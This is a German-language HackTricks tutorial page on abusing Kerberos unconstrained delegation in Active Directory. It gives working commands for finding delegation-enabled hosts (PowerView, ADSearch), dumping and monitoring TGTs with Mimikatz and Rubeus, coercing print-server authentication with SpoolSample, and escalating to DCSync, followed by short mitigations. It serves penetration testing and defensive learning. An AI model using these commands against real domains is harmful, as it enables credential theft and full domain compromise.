6 KiB
Unconstrained Delegation
{% hint style="success" %}
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Unconstrained delegation
Dies ist eine Funktion, die ein Domänenadministrator für jeden Computer innerhalb der Domäne festlegen kann. Jedes Mal, wenn sich ein Benutzer an dem Computer anmeldet, wird eine Kopie des TGT dieses Benutzers in das TGS gesendet, das vom DC bereitgestellt wird, und im Speicher in LSASS gespeichert. Wenn Sie also Administratorrechte auf der Maschine haben, können Sie die Tickets dumpen und die Benutzer auf jeder Maschine impersonieren.
Wenn sich also ein Domänenadministrator an einem Computer mit aktivierter Funktion "Unconstrained Delegation" anmeldet und Sie lokale Administratorrechte auf dieser Maschine haben, können Sie das Ticket dumpen und den Domänenadministrator überall impersonieren (Domänenprivilegieneskalation).
Sie können Computerobjekte mit diesem Attribut finden, indem Sie überprüfen, ob das Attribut userAccountControl ADS_UF_TRUSTED_FOR_DELEGATION enthält. Sie können dies mit einem LDAP-Filter von ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’ tun, was powerview macht:
# List unconstrained computers
## Powerview
Get-NetComputer -Unconstrained #DCs erscheinen immer, sind aber für privesc nicht nützlich
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Export tickets with Mimikatz
privilege::debug
sekurlsa::tickets /export #Empfohlene Methode
kerberos::list /export #Eine andere Methode
# Monitor logins and export new tickets
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #Überprüfen Sie alle 10s auf neue TGTsLaden Sie das Ticket des Administrators (oder des Opferbenutzers) im Speicher mit Mimikatz oder Rubeus für ein Pass the Ticket.
Weitere Informationen: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
Weitere Informationen zur Unconstrained Delegation bei ired.team.
Force Authentication
Wenn ein Angreifer in der Lage ist, einen Computer zu kompromittieren, der für "Unconstrained Delegation" erlaubt ist, könnte er einen Druckserver täuschen, um sich automatisch bei ihm anzumelden und ein TGT im Speicher des Servers zu speichern.
Dann könnte der Angreifer einen Pass the Ticket-Angriff durchführen, um das Benutzerkonto des Druckservercomputers zu impersonieren.
Um einen Druckserver dazu zu bringen, sich an einer beliebigen Maschine anzumelden, können Sie SpoolSample verwenden:
.\SpoolSample.exe <printmachine> <unconstrinedmachine>
Wenn das TGT von einem Domänencontroller stammt, könnten Sie einen DCSync-Angriff durchführen und alle Hashes vom DC erhalten.
Weitere Informationen zu diesem Angriff auf ired.team.
Hier sind weitere Möglichkeiten, um eine Authentifizierung zu erzwingen:
{% content-ref url="printers-spooler-service-abuse.md" %} printers-spooler-service-abuse.md {% endcontent-ref %}
Minderung
- Begrenzen Sie DA/Admin-Anmeldungen auf bestimmte Dienste
- Setzen Sie "Konto ist sensibel und kann nicht delegiert werden" für privilegierte Konten.
{% hint style="success" %}
Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Unterstützen Sie HackTricks
- Überprüfen Sie die Abonnementpläne!
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.